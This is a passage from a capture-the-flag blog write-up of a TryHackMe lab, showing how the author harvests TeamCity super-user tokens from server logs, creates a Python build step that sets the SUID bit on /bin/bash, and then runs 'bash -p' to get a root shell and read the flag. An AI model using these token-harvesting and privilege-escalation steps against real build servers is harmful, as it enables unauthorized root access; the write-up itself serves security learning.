    grep: webapps/ROOT/plugins/data-dir-browse: Permission denied
    grep: webapps/ROOT/plugins/coverage: Permission denied
    
    logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
    logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
    logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server)
    logs/catalina.out:[TeamCity] Super user authentication token: 8070510537629599387 (use empty username with the token as the password to access the server)
    
    sys-internal@vulnnet-internal:/TeamCity$ 
    
    


    authentication token 8070510537629599387

     

     

    I found several authentication tokens under logs/catalina.out. Using these, I can login. Poking around, I find I can create a new build.

     

     





     

     

    First Creating a new build, I can run a build step and execute python. My first thought was to throw in a python reverse shell but this did not work. so, don't worry we have a 2nd solution.

     

     

     


     

     

     

     

    Since TeamCity is running as root, whatever connection we can get it to spawn will be with root permissions, we immediately started to poke for console pages/terminal or anything that be used to run system commands

    After a while we figured you can create a project then build configuration, skipping the question for “New VCS Root”,

     

     

     

     


     

     


     

    After creating a build configuration
    choose “Build Steps” on the left menu to add a build step,

     

     

    Choose the runner type “Python”. Choose command as custom script

    then place in the custom script section we write a some simple script..

    I can change an SUID to elevate my privileges. Since bash is the easiest, I chose to do that.

     

     

    import os

    os.system("chmod +s /bin/bash")

     

     

     


     

     

     

    After saving this build and running it, I go back to SSH session.

     

     

     


     

     


     

     


     

     

     

     

     

     Here, I see /bin/bash permissions have changed.

     

     


    sys-internal@vulnnet-internal:/TeamCity$ 
    sys-internal@vulnnet-internal:/TeamCity$ cd 
    sys-internal@vulnnet-internal:~$ ls /bin/bash
    /bin/bash
    sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
    sys-internal@vulnnet-internal:~$ ls /bin/bash
    /bin/bash
    sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
    sys-internal@vulnnet-internal:~$ 
    
    

     

     

    I can now elevate my privileges to root..

     

     

     


     

     

     


     


     

    As root, I can read root.txt

     

     


    sys-internal@vulnnet-internal:~$ 
    sys-internal@vulnnet-internal:~$ cd /bin/bash
    -bash: cd: /bin/bash: Not a directory
    sys-internal@vulnnet-internal:~$ 
    sys-internal@vulnnet-internal:~$ /bin/bash -p
    bash-4.4# whoami
    root
    bash-4.4# #kumaratuljaiswal.in
    bash-4.4# 
    bash-4.4# cat /root/root.txt
    THM{e8996faea46df09dba5676dd271c60bd}
    bash-4.4# 
    

     

     



     


     


    Finally we won!! Thanks for supporting :-)

     



    Disclaimer

     

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

     

     

  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.